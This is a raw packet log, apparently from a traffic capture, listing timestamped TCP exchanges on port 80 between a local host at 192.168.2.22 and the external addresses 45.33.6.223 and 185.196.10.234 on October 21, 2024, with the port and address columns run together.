                                                                  Oct 21, 2024 11:29:47.926786900 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:47.926786900 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:47.926803112 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:47.926805973 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:47.926814079 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:47.926822901 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:47.926827908 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:47.926841021 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:47.926841974 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:47.926853895 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:47.926862955 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:47.926867008 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:47.926878929 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:47.926881075 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:47.926898956 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:47.926917076 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:47.930761099 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:47.930773973 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:47.930787086 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:47.930810928 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:47.930813074 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:47.930830002 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:47.930851936 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:47.933089972 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:47.933104992 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:47.933116913 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:47.933128119 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:47.933142900 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:47.933147907 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:47.933152914 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:47.933166981 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:47.933180094 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:47.933199883 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:47.935200930 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:47.935223103 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:47.935235023 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:47.935251951 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:47.935266972 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.008640051 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.008658886 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.008671045 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.008774042 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.013515949 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.013572931 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.013573885 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.013586044 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.013602972 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.013617992 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.013633013 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.013642073 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.013658047 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.013673067 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.013688087 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.013693094 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.013704062 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.013716936 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.013721943 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.013736963 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.013756990 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.013770103 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.014226913 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.014269114 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.014281034 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.014282942 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.014295101 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.014348030 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.014348030 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.014348030 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.014748096 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.014791965 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.014801979 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.014802933 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.014828920 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.014831066 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.014863968 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.014870882 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.052755117 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.052767038 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.052778959 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.052789927 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.052843094 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.052864075 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.052932978 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.052963018 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.052983046 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.052999020 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.055208921 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.055243969 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.055264950 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.055282116 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.055422068 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.055433989 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.055475950 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.128593922 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.128607988 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.128618956 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.128734112 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.133306026 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.133316040 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.133326054 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.133366108 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.133384943 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.133405924 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.133425951 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.133434057 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.133471012 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.133642912 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.133698940 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.133718967 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.133728981 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.133734941 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.133811951 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.134135962 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.134146929 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.134157896 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.134212971 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.134226084 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.134263992 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.134283066 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.134701967 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.134747982 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.134757996 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.134763002 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.134779930 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.134854078 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.172749043 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.172772884 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.172784090 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.172801971 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.172815084 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.172827959 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.172863007 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.175347090 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.175362110 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.175373077 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.175417900 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.175425053 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.175431967 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.175441980 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.175442934 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.175457001 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.175482988 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.248574972 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.248589993 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.248601913 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.248651981 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.248683929 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.253336906 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.253360033 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.253371954 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.253408909 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.253429890 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.253438950 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.253452063 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.253489971 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.253544092 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.253595114 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.253624916 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.253673077 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.253678083 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.253720999 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.253777027 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.253798008 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.253812075 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.253825903 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.253825903 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.253853083 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.253870010 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.254309893 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.254323006 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.254336119 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.254348040 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.254368067 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.254368067 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.254378080 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.254394054 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.254434109 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.254836082 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.254848003 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.254861116 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.254889965 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.254904032 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.292668104 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.292720079 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.292756081 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.292768955 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.292781115 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.292793989 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.292807102 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.292833090 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.292975903 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.293025017 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.293026924 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.293067932 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.295345068 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.295376062 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.295402050 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.295404911 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.295434952 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.295452118 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.295491934 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.295511007 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.295527935 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.295542955 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.295597076 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.295597076 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.295666933 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.375055075 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.375097036 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.375113010 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.375128984 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.375144958 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.375159979 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.375174999 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.375190973 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.375193119 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.375209093 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.375215054 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.375231028 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.375294924 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.375427961 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.375478029 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.375498056 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.375514030 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.375530005 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.375545025 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.375566959 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.375571012 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.375585079 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.375586987 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.375605106 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.375608921 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.375622988 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.375626087 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.375641108 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.375683069 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.375683069 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.375683069 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.376370907 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.376434088 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.413042068 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.413075924 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.413090944 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.413105965 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.413119078 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.413158894 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.413937092 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.415431976 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.415457010 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.415469885 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.415493011 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.415508986 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.415604115 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.415628910 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.415646076 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.415653944 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.415658951 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.415673971 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.415678978 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.415697098 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.415721893 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.416054010 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.416090965 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.416115046 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.416130066 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.495372057 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.495405912 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.495419979 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.495431900 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.495445967 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.495464087 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.495507002 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.495739937 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.496205091 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.496228933 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.496243000 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.496254921 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.496258974 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.496267080 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.496284962 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.496296883 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.496330976 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.496354103 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.496367931 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.496377945 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.496381044 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.496396065 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.496397972 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.496407986 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.496421099 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.496436119 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.496655941 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.496704102 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.496712923 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.496726036 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.496759892 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.496768951 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.496781111 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.496793032 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.496809959 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.496819973 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.496838093 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.532922029 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.532954931 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.532968998 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.532984018 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.533001900 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.533016920 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.533026934 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.533042908 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.533056974 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.535403967 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.535418987 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.535440922 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.535453081 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.535465956 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.535486937 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.535490990 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.535506010 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.535589933 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.535773993 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.535825014 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:48.535856009 CEST804916445.33.6.223192.168.2.22
                                                                  Oct 21, 2024 11:29:48.535902977 CEST4916480192.168.2.2245.33.6.223
                                                                  Oct 21, 2024 11:29:56.208184004 CEST4916580192.168.2.22185.196.10.234
                                                                  Oct 21, 2024 11:29:56.212982893 CEST8049165185.196.10.234192.168.2.22
                                                                  Oct 21, 2024 11:29:56.213057995 CEST4916580192.168.2.22185.196.10.234
                                                                  Oct 21, 2024 11:29:56.223706007 CEST4916580192.168.2.22185.196.10.234
                                                                  Oct 21, 2024 11:29:56.228488922 CEST8049165185.196.10.234192.168.2.22
                                                                  Oct 21, 2024 11:29:56.228548050 CEST4916580192.168.2.22185.196.10.234
